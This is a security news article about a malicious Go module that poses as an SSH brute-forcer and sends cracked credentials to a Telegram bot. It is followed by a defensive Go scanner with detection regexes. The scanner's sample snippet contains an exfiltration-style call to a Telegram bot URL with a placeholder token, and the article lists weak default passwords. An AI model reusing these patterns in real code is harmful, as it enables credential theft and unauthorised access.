Malicious Go Module Masquerades as SSH Brute Forcer to Exfiltrate Credentials via Telegram


Cybersecurity experts have identified a malicious Go module that disguises itself as an SSH brute-force tool but secretly transmits stolen credentials to its operator.

According to researcher Kirill Boychenko from Socket, the package immediately sends the victim’s IP address, username, and password to a hardcoded Telegram bot upon the first successful login.

The module, named “golang-random-ip-ssh-bruteforce”, was linked to a GitHub profile known as IllDieAnyway (G3TT), which has since been removed. Despite this, the package remains available on pkg.go[.]dev and was originally published on June 24, 2022.

The malicious tool scans random IPv4 addresses for exposed SSH services on TCP port 22, attempts brute-force logins using an embedded wordlist, and then forwards any successful credentials to the attacker’s Telegram bot.

A concerning element of the malware is its deliberate disabling of host key verification: it uses “ssh.InsecureIgnoreHostKey” as the SSH client’s host key callback, so the client accepts whatever key any server presents, regardless of authenticity.

The built-in wordlist is minimal, containing only two usernames (root, admin) paired with weak passwords such as root, test, password, admin, 12345678, 1234, qwerty, webadmin, webmaster, techsupport, letmein, and Passw@rd.

The malware runs in a continuous loop, generating IPv4 addresses and attempting concurrent SSH logins. Stolen details are sent to the attacker’s Telegram bot “@sshZXC_bot”, which then passes them to the account “@io_ping” (Gett) for collection.


Archived snapshots of the deleted GitHub account show that the threat actor’s portfolio included an IP port scanner, an Instagram parser, and a PHP-based C2 botnet named Selica-C2.

The same individual’s YouTube channel is still active, hosting videos on topics such as “How to hack a Telegram bot” and a so-called “SMS bomber” tool for Russia, capable of sending spam messages to VK users through Telegram bots. Evidence suggests the operator is of Russian origin.

Boychenko noted that the malware cleverly shifts risk to users by making them unknowingly perform the scanning and brute-force attempts. The captured data is funneled into the attacker’s single Telegram bot. With host key verification disabled, high concurrency enabled, and immediate exit after the first valid login, the malware is designed for fast credential harvesting.

Additionally, since Telegram Bot API traffic uses HTTPS, the exfiltration process resembles normal web traffic, which allows it to evade basic egress detection.
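Two of the traits described above, the disabled host key verification (the ssh.InsecureIgnoreHostKey callback) and a Telegram Bot API endpoint hardcoded into the module, are both visible in plain source before the code is ever run. The following is an added example, not code from Socket’s report or from the malicious module, of a small stdlib-only Go scanner that a reviewer can point at vendored dependencies to flag those two indicators. The rule names, the regular expressions, the assumed token shape (digits, a colon, then an alphanumeric string, based on the public Bot API URL format `api.telegram.org/bot<token>/<method>`) and the embedded sample snippet are all constructed for this example; the sample uses an obvious placeholder, not a real token.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strings"
)

// Finding records one suspicious line found in a Go source file.
type Finding struct {
	Line int    // 1-based line number within the scanned source
	Rule string // which indicator matched
	Text string // the offending line, trimmed
}

// rules are the two indicators the article describes. The token pattern is an
// assumption about the shape of a Bot API URL (api.telegram.org/bot<id>:<secret>/...).
var rules = []struct {
	name string
	re   *regexp.Regexp
}{
	{"ssh-hostkey-verification-disabled", regexp.MustCompile(`ssh\.InsecureIgnoreHostKey\s*\(`)},
	{"telegram-bot-api-endpoint", regexp.MustCompile(`api\.telegram\.org/bot[0-9]+:[A-Za-z0-9_-]+`)},
}

// ScanSource runs every rule over each line of src and returns all matches,
// in line order. A plain string-match scanner like this will not see strings
// that are built at runtime or obfuscated; it is a first-pass review aid.
func ScanSource(src string) []Finding {
	var out []Finding
	sc := bufio.NewScanner(strings.NewReader(src))
	for n := 1; sc.Scan(); n++ {
		line := sc.Text()
		for _, r := range rules {
			if r.re.MatchString(line) {
				out = append(out, Finding{Line: n, Rule: r.name, Text: strings.TrimSpace(line)})
			}
		}
	}
	return out
}

// sample is a constructed snippet shaped like the behaviour the article
// describes (host key checks off, results posted to a Bot API URL). It is not
// the module's code, and the token is a placeholder.
const sample = `cfg := &ssh.ClientConfig{
	User:            user,
	Auth:            []ssh.AuthMethod{ssh.Password(pass)},
	HostKeyCallback: ssh.InsecureIgnoreHostKey(),
	Timeout:         3 * time.Second,
}
resp, _ := http.Get("https://api.telegram.org/bot0000000000:EXAMPLE_TOKEN_PLACEHOLDER/sendMessage?chat_id=0&text=" + msg)`

func main() {
	for _, f := range ScanSource(sample) {
		fmt.Printf("line %d [%s]: %s\n", f.Line, f.Rule, f.Text)
	}
}
```

In a real review you would feed ScanSource the contents of each .go file under the module cache or vendor directory rather than the embedded sample; a hit on the host key rule is worth a look on its own, since a client that never checks server identity is wrong for almost any legitimate tool, and a hit on the Bot API rule in a package that has no business talking to Telegram is a strong reason to stop and read the code. On the network side, the same HTTPS traffic the article notes as blending in still carries the api.telegram.org name in DNS and TLS SNI, which is where egress monitoring can pick it up.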